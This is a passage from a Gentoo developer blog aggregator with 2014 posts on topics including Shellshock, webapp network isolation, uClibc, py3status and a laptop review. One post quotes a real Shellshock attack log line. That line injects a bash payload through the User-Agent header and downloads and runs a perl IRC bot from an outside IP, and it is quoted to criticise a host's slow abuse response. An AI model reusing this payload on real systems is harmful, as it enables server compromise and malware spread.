Moving from HWAccel1 to HWAccel2 in general would result in less lines of code in the application, the people wanting to keep their callback need to just set them after avcodec_open2 and move the pixel specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make much simpler managing the backend specific resources.

Expected Time of Arrival

Right now the review is on the HWaccel1.3, I hope to complete this step and add few new backends to test how good/bad that API is before adding the other steps. Probably HWAccel2 will take at least other 6 months.

Help in form of code or just moral support is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snap shot of my system running 3.12.30-gentoo sources and google chrome version 39.0.2171.19_p1.

netflix

 

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

 

 

October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was due for a long time now as it features a lot of great contributions !

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

Heartbleed logoThe free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs where quite different I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL that allowed to extract privat keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was first hesistant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle-attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much securer than it ever was and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-alike bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others, we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students where writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependant and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute force writing 0′s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of  uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know its a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3′s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting thing that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users to have direct network access. Not only ping to known addresses to just verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is because I realized that most people don't do the one obvious step to mitigate this kind of problems by removing (or at least limiting) the access to the network of their web apps. So I decided it might be a worth idea to describe a moment why you should think of that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early nougthies probably have heard of the term Application Server, which usually is present in form of Apache Tomcat or IBM WebSphere, but here is essentially the same "actor" for Rails app in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially mean that in the basic web interaction, there is no network access needed for the application service.

Things gets a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, to either ping them to tell them that a new post is out, and to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad history of security and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: negate any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straight forward to implement as neither Passenger not php-fpm has a clean way to pass environment variables per users.

What I've done is for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still out for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll be soon shutting down both implementations since I really don't need it. Indeed the Publify development still seems to go toward the "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect me to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been update in about 10 years and there were dozens of accumulated patches on the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done” whatever that meant, so I was going to tree clean it.  I expressed my intentions on the upstream mailing list when I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patch.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com>  from OpenSUSE fixed a possible DOS triggered by specially crafted .htpasswd. Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed makes it perfect for embedded systems which are near and dear to my heart.  I also make sure it compiles on *BSD and Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

Thinkpad X1 CarbonWhile I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems rarely shops keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys, instead it has what Lenovo calls an adaptive keyboard: A touch sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Beside that Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it's used to be (small downside), but the </>/| key is where it belongs(big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to ultrabook / integrated design easy changing battery, ram or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs how to get all the hardware in a laptop running on Linux which I did my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However I thought having a central place where I collect relevant information would be nice so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today, F9 did not seem to be working, actualy most of the F-keys did not.

The reason turnout out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not no key. Really? There is no context menu, backspace and delete didn’t help. For now I assume it’s not possible.
So I fire up the gconf-editor, menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…” gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.

I just opened a bug for this. If you like, you can follow it at https://github.com/Guake/guake/issues/376 .